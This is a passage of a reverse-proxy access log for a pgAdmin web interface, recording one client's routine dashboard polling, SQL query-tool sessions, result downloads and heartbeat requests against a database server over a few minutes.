"https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:44 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:44 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:45 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:47 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 611] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:47 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:49 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/download/3857941" [Client 84.1.26.27] [Length 297] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:04 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:06 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:06 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:07 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 1709] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:07 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:08 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:10 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/download/3857941" [Client 84.1.26.27] [Length 4262] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:10 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:12 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:16 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:48:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:48:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:49:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:50:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:50:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:08 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:51:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:52:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:52:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:52:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 